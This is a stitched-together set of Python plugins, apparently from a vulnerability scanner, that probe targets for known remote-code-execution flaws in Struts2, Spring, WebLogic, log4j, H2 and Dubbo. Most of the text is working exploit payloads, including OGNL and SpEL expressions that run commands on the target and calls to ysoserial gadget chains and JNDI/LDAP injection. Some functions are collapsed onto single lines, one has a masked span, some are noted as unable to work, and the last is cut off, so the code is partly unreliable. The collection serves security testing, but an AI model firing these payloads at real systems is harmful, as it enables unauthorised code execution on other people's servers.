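def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
    """Probe *Url* for the Spring Security OAuth2 RCE (CVE-2018-1260) using a DNS-log callback.

    Args:
        Url: target handed over by the framework; UrlProcessing splits it into scheme, host and port.
        Headers: request headers supplied by the caller; passed through unchanged.
        proxies: proxy setting, normalised through Proxies().result.
        **kwargs: forwarded to VulnerabilityDetails.

    Returns:
        None. A positive result is recorded through VulnerabilityDetails and WriteFile;
        any exception is routed to ErrorHandling/ErrorLog instead of propagating.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme only when UrlProcessing did not return one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        DL = Dnslog()
        # The DNS-log hostname embedded in the scope parameter is the only evidence channel:
        # a hit on DL.result() is what marks the target as vulnerable.
        payload = "/oauth/authorize?client_id=client&response_type=code&redirect_uri=http://www.github.com&scope=%24%7BT%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22ping%20{}%22%29%7D".format(DL.dns_host())
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        # verify=False disables TLS certificate checking (presumably deliberate for a scanner).
        resp = requests.get(payload_url, headers=Headers, proxies=proxies, timeout=6, verify=False)
        time.sleep(4)  # allow the out-of-band callback to arrive before polling the DNS log
        if DL.result():
            Medusa = "{}存在SpringSecurityOauth2远程代码执行漏洞(CVE-2018-1260)\r\n验证数据:\r\n返回内容:{}\r\nDnsLog:{}\r\nDnsLog数据:{}\r\n".format(url, resp.text, DL.dns_host(), str(DL.dns_text()))
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url, **kwargs).Write()  # hand the url and the finding to the reporter
            WriteFile().result(str(url), str(Medusa))  # per-target result file, keyed by url
    except Exception as e:
        # Framework convention: a plugin never aborts the scan; errors go through the shared error path.
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e)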
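def medusa(**kwargs) -> None:
    """Probe the target for the WebLogic WLS core deserialization RCE (CVE-2018-2628).

    Reads ``Url`` from *kwargs*. The actual probe is performed by the external ``exploit``
    helper; this plugin only prepares its inputs and evaluates the DNS-log callback.

    NOTE(review): ``Headers`` and ``Proxies`` from *kwargs* are not passed to ``exploit``,
    so a proxy configured by the caller is not honoured by this plugin.

    Returns:
        None. Findings go through VulnerabilityDetails/WriteFile; exceptions are logged via
        ErrorHandling/ErrorLog rather than raised.
    """
    Url = kwargs.get("Url")
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme only when UrlProcessing did not return one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        DL = Dnslog()
        JrmpPort = "2000"  # any free local port works here (original author's note)
        JrmpClient = "JRMPClient"
        YsoserialPath = GetToolFilePath().Result() + "ysoserial.jar"
        # Unique scratch path: epoch seconds plus a 10-character random suffix.
        TempPath = GetTempFilePath().Result() + str(int(time.time())) + "_" + randoms().result(10)
        con, payload = exploit(url, port, YsoserialPath, DL.dns_host(), JrmpPort, JrmpClient, TempPath)
        time.sleep(5)  # allow the out-of-band callback to arrive before polling the DNS log
        if DL.result():
            Medusa = "{}存在WeblogicWLS核心组件反序列化命令执行漏洞(CVE-2018-2628)\r\n验证数据:\r\n使用POC:{}\r\n返回数据包:{}\r\nDNSlog内容:{}\r\nDNSlog返回结果:{}\r\n".format(url, payload, con, DL.dns_host(), DL.dns_text())
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, "", **kwargs).Write()  # hand the finding to the reporter
            WriteFile().result(str(url), str(Medusa))  # per-target result file, keyed by url
    except Exception as e:
        # Framework convention: a plugin never aborts the scan; errors go through the shared error path.
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e)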
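def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Probe *Url* for a log4j deserialization RCE using a DNS-log callback.

    Args:
        Url: target; UrlProcessing yields scheme, host and port.
        RandomAgent: accepted for interface compatibility; not used by this plugin.
        proxies: proxy setting, normalised through Proxies().result (not used afterwards).
        **kwargs: forwarded to ClassCongregation.VulnerabilityDetails.

    NOTE(review): this block only runs ysoserial locally and reads its output from a pipe.
    It never opens a connection to the target, so a DNS-log hit cannot originate from a
    request made here; the plugin looks incomplete.

    Returns:
        None. Findings go through VulnerabilityDetails/WriteFile; exceptions are logged via
        ErrorHandling/ErrorLog rather than raised.
    """
    proxies = Proxies().result(proxies)
    # Every sibling plugin calls UrlProcessing().result(Url); the bare constructor call used
    # here could not be unpacked into three values.
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme only when UrlProcessing did not return one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        dns = Dnslog()
        YsoserialPath = GetToolFilePath().Result() + "ysoserial.jar"
        # Context manager + communicate(): reap the child and close the stdout pipe instead of
        # leaking both (the original never waited on the process).
        with subprocess.Popen(
            ["java", "-jar", YsoserialPath, "CommonsCollections5", "ping " + dns.dns_host()],
            stdout=subprocess.PIPE,
        ) as proc:
            proc.communicate()
        time.sleep(5)  # allow the out-of-band callback to arrive before polling the DNS log
        if dns.result():
            Medusa = "{}存在log4j远程命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\nDNSlog请求值{}\r\nDNSlog数据{}\r\n".format(url, scheme + "://" + url + ":" + str(port), dns.dns_host(), dns.dns_text())
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url, **kwargs).Write()  # hand url and finding to the reporter
            ClassCongregation.WriteFile().result(str(url), str(Medusa))  # per-target result file, keyed by url
    except Exception as e:
        # Framework convention: a plugin never aborts the scan; errors go through the shared error path.
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        ClassCongregation.ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e)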
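def medusa(**kwargs) -> None:
    """Probe the target for the log4j deserialization RCE (CVE-2019-17571) using a DNS-log callback.

    Reads ``Url`` from *kwargs*.

    NOTE(review): this block only runs ysoserial locally and reads its output from a pipe.
    It never opens a connection to the target (``Headers``/``Proxies`` from *kwargs* are
    unused), so a DNS-log hit cannot originate from a request made here.

    Returns:
        None. Findings go through ClassCongregation.VulnerabilityDetails/WriteFile;
        exceptions are logged via ErrorHandling/ErrorLog rather than raised.
    """
    url = kwargs.get("Url")
    try:
        dns = Dnslog()
        YsoserialPath = GetToolFilePath().Result() + "ysoserial.jar"
        # Context manager + communicate(): reap the child and close the stdout pipe instead of
        # leaking both (the original never waited on the process).
        with subprocess.Popen(
            ["java", "-jar", YsoserialPath, "CommonsCollections5", "ping " + dns.dns_host()],
            stdout=subprocess.PIPE,
        ) as proc:
            proc.communicate()
        time.sleep(5)  # allow the out-of-band callback to arrive before polling the DNS log
        if dns.result():
            Medusa = "{}存在log4j远程命令执行漏洞(CVE-2019-17571)\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\nDNSlog请求值{}\r\nDNSlog数据{}\r\n".format(url, url, dns.dns_host(), dns.dns_text())
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, "", **kwargs).Write()  # hand the finding to the reporter
            ClassCongregation.WriteFile().result(str(url), str(Medusa))  # per-target result file, keyed by url
    except Exception as e:
        # Framework convention: a plugin never aborts the scan; errors go through the shared error path.
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        ClassCongregation.ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e)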
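def medusa(**kwargs) -> None:
    """Probe the target for Struts2 S2-009 (OGNL injection) using a DNS-log callback.

    Reads ``Url``, ``Headers`` and ``Proxies`` from *kwargs*. The probe path is appended to
    ``Url`` as given; no scheme/port normalisation is performed here.

    Returns:
        None. Findings go through VulnerabilityDetails/WriteFile; exceptions are logged via
        ErrorHandling/ErrorLog rather than raised.
    """
    url = kwargs.get("Url")
    Headers = kwargs.get("Headers")
    proxies = kwargs.get("Proxies")
    try:
        # Dnslog() and the payload build are inside the try so that a DNS-log service failure is
        # logged like every other error instead of escaping the plugin (sibling plugins do this too).
        DL = Dnslog()
        payload = """?age=medusa&name=%28%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3D+new+java.lang.Boolean%28true%29,%[email protected]@getRuntime%28%29.exec%28%27ping%20{}%27%29%29%28meh%29&z%5B%28name%29%28%27meh%27%29%5D=true""".format(DL.dns_host())
        payload_url = url + payload
        # verify=False disables TLS certificate checking (presumably deliberate for a scanner).
        resp = requests.get(payload_url, headers=Headers, timeout=6, proxies=proxies, verify=False)
        con = resp.text
        time.sleep(3)  # allow the out-of-band callback to arrive before polling the DNS log
        if DL.result():
            Medusa = "{} 存在Struts2远程代码执行漏洞(S2-009)\r\n漏洞详情:\r\n版本号:S2-009\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(url, payload_url, con, DL.dns_text(), DL.dns_host())
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, resp, **kwargs).Write()  # hand the response and finding to the reporter
            WriteFile().result(str(url), str(Medusa))  # per-target result file, keyed by url
    except Exception as e:
        # Framework convention: a plugin never aborts the scan; errors go through the shared error path.
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e)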
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None: proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/h2-console/login.do?jsessionid=" payload_url = scheme + "://" + url + ":" + str( port) + payload + "ad3ae393781ccf8d7abf0345aa88e398" jsession = requests.get( payload_url, timeout=5, proxies=proxies, verify=False, headers=Headers, ) global pgroups preg = re.compile(r"login\.jsp\?jsessionid=(.*?)'", re.S) pgroups = re.findall(preg, jsession.text) if not pgroups: preg = re.compile(r"admin\.do\?jsessionid=(.*?)\"", re.S) pgroups = re.findall(preg, jsession.text) payload_url2 = scheme + "://" + url + ":" + str( port) + payload + pgroups[0] Headers2 = Headers Headers2['Content-Type'] = 'application/x-www-form-urlencoded' Headers2['Referer'] = payload_url2 DL = Dnslog() data = "language=en&setting=Generic+JNDI+Data+Source&name=Generic+JNDI+Data+Source&driver=javax.naming.InitialContext&url=ldap%3A%2F%2F{}%2FExploit&user=&password="******"{}存在SpringBootH2数据库JNDI注入漏洞\r\n验证数据:\r\n返回内容:{}\r\nDnsLog:{}\r\nDnsLog数据:{}\r\n".format( url, resp.text, DL.dns_host(), str(DL.dns_text())) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
    """Probe *Url* for Struts2 S2-046 (multipart filename OGNL injection).

    Args:
        Url: target; UrlProcessing yields scheme, host, port and path.
        Headers: caller-supplied request headers. NOTE(review): this dict is mutated in place
            (Content-Length and Content-Type are overwritten), so the change leaks to the caller.
        proxies: proxy setting, normalised through Proxies().result.
        **kwargs: forwarded to VulnerabilityDetails.

    Returns:
        None. Findings go through VulnerabilityDetails/WriteFile; exceptions are logged via
        ErrorHandling/ErrorLog rather than raised.

    NOTE(review): the multipart body below appears to have lost its original line breaks in
    this copy of the file (everything sits on one line); verify against the upstream source.
    NOTE(review): detection relies solely on DL.result(), but the request body does not
    reference DL.dns_host() anywhere, so the DNS-log check cannot be triggered by this request.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port, path = UrlProcessing().result(Url)
    # Default the port from the scheme only when UrlProcessing did not return one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op kept as written
    DL = Dnslog()
    con = ""  # response body; stays empty when the request fails
    data = b"""-----------------------------735323031399963166993862150 Content-Disposition: form-data; name="foo"; filename="%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\x00" Content-Type: text/plain x -----------------------------735323031399963166993862150-- """
    try:
        payload_url = scheme + "://" + url + ":" + str(port) + path
        Headers["Content-Length"] = "10000000"
        Headers["Content-Type"] = "multipart/form-data; boundary=---------------------------735323031399963166993862150"
        try:
            # Best effort: a target that executes the expression may hang until the timeout,
            # so a failed request must not abort the DNS-log check (author's original intent).
            # verify=False disables TLS certificate checking (presumably deliberate for a scanner).
            resp = requests.post(payload_url, headers=Headers, data=data, timeout=6, proxies=proxies, verify=False)
            con = resp.text
        except Exception as e:
            pass
        time.sleep(2)  # allow the out-of-band callback to arrive before polling the DNS log
        if DL.result():
            Medusa = "{} 存在Struts2远程代码执行漏洞(S2-046)\r\n漏洞详情:\r\n版本号:S2-046\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(url, data, con, DL.dns_text(), DL.dns_host())
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url, **kwargs).Write()  # hand url and finding to the reporter
            WriteFile().result(str(url), str(Medusa))  # per-target result file, keyed by url
    except Exception as e:
        # Framework convention: a plugin never aborts the scan; errors go through the shared error path.
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e)
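def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Probe *Url* for Struts2 S2-057 (namespace OGNL injection) using a DNS-log callback.

    Two payload variants are tried in turn; each is inserted between the directory part and
    the final component of the request path.

    Args:
        Url: target; UrlProcessing yields scheme, host, port and path.
        RandomAgent: User-Agent string to send.
        proxies: proxy setting, normalised through Proxies().result.
        **kwargs: forwarded to VulnerabilityDetails.

    Returns:
        None. Findings go through VulnerabilityDetails/WriteFile; exceptions are logged via
        ErrorHandling/ErrorLog rather than raised.

    NOTE(review): unlike the sibling Struts2 plugins there is no delay before DL.result(),
    so a slow callback may be missed on the first payload.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port, path = UrlProcessing().result(Url)
    # Default the port from the scheme only when UrlProcessing did not return one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    DL = Dnslog()
    con = ""  # response body; stays empty when the request fails
    payload1 = '%24%7B%28%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27' + "ping%20" + DL.dns_host() + '%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/'
    payload2 = "%24%7B%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27" + "ping%20" + DL.dns_host() + "%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/"
    # Headers do not depend on the payload, so build them once outside the loop.
    headers = {
        'User-Agent': RandomAgent,
        "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate",
    }
    for payload in [payload1, payload2]:
        try:
            # Directory part and last path component; the payload is spliced in between.
            path1, path2 = os.path.split(path)
            payload_url = scheme + "://" + url + ":" + str(port) + path1 + "/" + payload + path2
            try:
                # Best effort: a target that executes the expression may hang until the timeout,
                # so a failed request must not abort the DNS-log check.
                # verify=False disables TLS certificate checking (presumably deliberate for a scanner).
                resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False, allow_redirects=False)
                con = resp.text
            except Exception:  # was a bare except, which also swallowed KeyboardInterrupt/SystemExit
                pass
            if DL.result():
                Medusa = "{} 存在Struts2远程代码执行漏洞(S2-057)\r\n漏洞详情:\r\n版本号:S2-057\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(url, payload_url, con, DL.dns_text(), DL.dns_host())
                _t = VulnerabilityInfo(Medusa)
                VulnerabilityDetails(_t.info, url, **kwargs).Write()  # hand url and finding to the reporter
                WriteFile().result(str(url), str(Medusa))  # per-target result file, keyed by url
        except Exception as e:
            # Framework convention: a plugin never aborts the scan; errors go through the shared error path.
            _ = VulnerabilityInfo('').info.get('algroup')
            ErrorHandling().Outlier(e, _)
            ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e)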
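def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Probe *Url* for Struts2 S2-015 (action-name OGNL injection) using a DNS-log callback.

    Args:
        Url: target; UrlProcessing yields scheme, host, port and path.
        RandomAgent: User-Agent string to send.
        proxies: proxy setting, normalised through Proxies().result.
        **kwargs: forwarded to VulnerabilityDetails.

    Returns:
        None. Findings go through VulnerabilityDetails/WriteFile; exceptions are logged via
        ErrorHandling/ErrorLog rather than raised.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port, path = UrlProcessing().result(Url)
    # Default the port from the scheme only when UrlProcessing did not return one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    DL = Dnslog()
    con = ""  # response body; stays empty when the request fails
    payload = """%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27ping%20{}%27%29.getInputStream%28%29%29%2C%23q%7D.action""".format(DL.dns_host())
    try:
        payload_url = scheme + "://" + url + ":" + str(port) + path + payload
        headers = {
            'User-Agent': RandomAgent,
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }
        try:
            # Best effort: a target that executes the expression may hang until the timeout,
            # so a failed request must not abort the DNS-log check.
            # verify=False disables TLS certificate checking (presumably deliberate for a scanner).
            resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False)
            con = resp.text
        except Exception:  # was a bare except, which also swallowed KeyboardInterrupt/SystemExit
            pass
        time.sleep(2)  # allow the out-of-band callback to arrive before polling the DNS log
        if DL.result():
            Medusa = "{} 存在Struts2远程代码执行漏洞(S2-015)\r\n漏洞详情:\r\n版本号:S2-015\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(url, payload_url, con, DL.dns_text(), DL.dns_host())
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url, **kwargs).Write()  # hand url and finding to the reporter
            WriteFile().result(str(url), str(Medusa))  # per-target result file, keyed by url
    except Exception as e:
        # Framework convention: a plugin never aborts the scan; errors go through the shared error path.
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e)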
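def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Probe *Url* for Struts2 S2-016 (redirect: prefix OGNL injection) using a DNS-log callback.

    Args:
        Url: target; UrlProcessing yields scheme, host, port and path.
        RandomAgent: User-Agent string to send.
        proxies: proxy setting, normalised through Proxies().result.
        **kwargs: forwarded to VulnerabilityDetails.

    Returns:
        None. Findings go through VulnerabilityDetails/WriteFile; exceptions are logged via
        ErrorHandling/ErrorLog rather than raised.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port, path = UrlProcessing().result(Url)
    # Default the port from the scheme only when UrlProcessing did not return one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    DL = Dnslog()
    con = ""  # response body; stays empty when the request fails
    payload = """?redirect:%24%7B%23a%3D%28new%20java.lang.ProcessBuilder%28new%20java.lang.String%5B%5D%7B%27ping%27%2c%27{}%27%7D%29%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew%20java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew%20java.io.BufferedReader%28%23c%29%2C%23e%3Dnew%20char%5B500%5D%2C%23d.read%28%23e%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23d.read%28%23e%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23d.read%28%23e%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23d.read%28%23e%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23d.read%28%23e%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D""".format(DL.dns_host())
    try:
        payload_url = scheme + "://" + url + ":" + str(port) + path + payload
        headers = {
            'User-Agent': RandomAgent,
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }
        try:
            # Best effort: a target that executes the expression may hang until the timeout,
            # so a failed request must not abort the DNS-log check.
            # verify=False disables TLS certificate checking (presumably deliberate for a scanner).
            resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False)
            con = resp.text
        except Exception:  # was a bare except, which also swallowed KeyboardInterrupt/SystemExit
            pass
        time.sleep(2)  # allow the out-of-band callback to arrive before polling the DNS log
        if DL.result():
            Medusa = "{} 存在Struts2远程代码执行漏洞(S2-016)\r\n漏洞详情:\r\n版本号:S2-016\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(url, payload_url, con, DL.dns_text(), DL.dns_host())
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url, **kwargs).Write()  # hand url and finding to the reporter
            WriteFile().result(str(url), str(Medusa))  # per-target result file, keyed by url
    except Exception as e:
        # Framework convention: a plugin never aborts the scan; errors go through the shared error path.
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e)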
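def medusa(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
    """Probe *Url* for the Spring Data Commons SpEL RCE using a DNS-log callback.

    Args:
        Url: target; UrlProcessing yields scheme, host and port.
        RandomAgent: User-Agent string to send.
        proxies: proxy setting, normalised through Proxies().result.
        **kwargs: forwarded to VulnerabilityDetails.

    Returns:
        None. Findings go through VulnerabilityDetails/WriteFile; exceptions are logged via
        ErrorHandling/ErrorLog rather than raised.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme only when UrlProcessing did not return one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        DL = Dnslog()
        data = """username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("ping+%s")]=xxx""" % DL.dns_host()
        payload = "/users?page=&size=5"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "application/x-www-form-urlencoded",
            "Referer": payload_url
        }
        # verify=False disables TLS certificate checking (presumably deliberate for a scanner).
        resp = requests.post(payload_url, data=data, headers=headers, proxies=proxies, timeout=6, verify=False)
        time.sleep(4)  # allow the out-of-band callback to arrive before polling the DNS log
        if DL.result():
            Medusa = "{}存在SpringDataCommons远程命令执行漏洞\r\n验证数据:\r\n返回内容:{}\r\nDnsLog:{}\r\nDnsLog数据:{}\r\n".format(url, resp.text, DL.dns_host(), str(DL.dns_text()))
            # The stray debug print(Medusa) was removed: sibling plugins report only via the
            # reporter/result file, and stdout is not part of the plugin contract.
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url, **kwargs).Write()  # hand url and finding to the reporter
            WriteFile().result(str(url), str(Medusa))  # per-target result file, keyed by url
    except Exception as e:
        # Framework convention: a plugin never aborts the scan; errors go through the shared error path.
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e)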
def medusa(**kwargs) -> None: Url = kwargs.get("Url") #获取传入的url参数 scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: DL = Dnslog() client = DubboClient(url, int(port)) JdbcRowSetImpl = new_object('com.sun.rowset.JdbcRowSetImpl', dataSource="ldap://" + DL.dns_host(), strMatchColumns=["foo"]) JdbcRowSetImplClass = new_object( 'java.lang.Class', name="com.sun.rowset.JdbcRowSetImpl", ) toStringBean = new_object('com.rometools.rome.feed.impl.ToStringBean', beanClass=JdbcRowSetImplClass, obj=JdbcRowSetImpl) resp = client.send_request_and_return_response( service_name= 'org.apache.dubbo.spring.boot.sample.consumer.DemoService', # 此处可以是 $invoke、$invokeSync、$echo 等,通杀 2.7.7 及 CVE 公布的所有版本。 method_name='$invoke', args=[toStringBean]) time.sleep(3) if DL.result(): Medusa = "{} 存在Dubbo反序列化漏洞(CVE-2020-1948)\r\n验证数据:\r\n返回DNSLOG:{}\r\n使用DNSLOG数据:{}\r\n返回数据包:{}\r\n".format( url, DL.dns_text(), DL.dns_host(), str(resp)) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, "", **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) # 调用写入类传入URL和错误插件名
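def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Probe *Url* for Struts2 S2-008 (debug=command OGNL injection) using a DNS-log callback.

    Args:
        Url: target; UrlProcessing yields scheme, host, port and path.
        RandomAgent: User-Agent string to send.
        proxies: proxy setting, normalised through Proxies().result.
        **kwargs: forwarded to VulnerabilityDetails.

    Returns:
        None. Findings go through VulnerabilityDetails/WriteFile; exceptions are logged via
        ErrorHandling/ErrorLog rather than raised.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port, path = UrlProcessing().result(Url)
    # Default the port from the scheme only when UrlProcessing did not return one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        # Dnslog() and the payload build are inside the try so that a DNS-log service failure is
        # logged like every other error instead of escaping the plugin.
        DL = Dnslog()
        payload = """?debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%[email protected]@getRuntime%28%29.exec%28%22ping%20{}%22%29)""".format(DL.dns_host())
        payload_url = scheme + "://" + url + ":" + str(port) + path + payload
        headers = {
            'User-Agent': RandomAgent,
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }
        # verify=False disables TLS certificate checking (presumably deliberate for a scanner).
        resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False)
        con = resp.text
        time.sleep(3)  # allow the out-of-band callback to arrive before polling the DNS log
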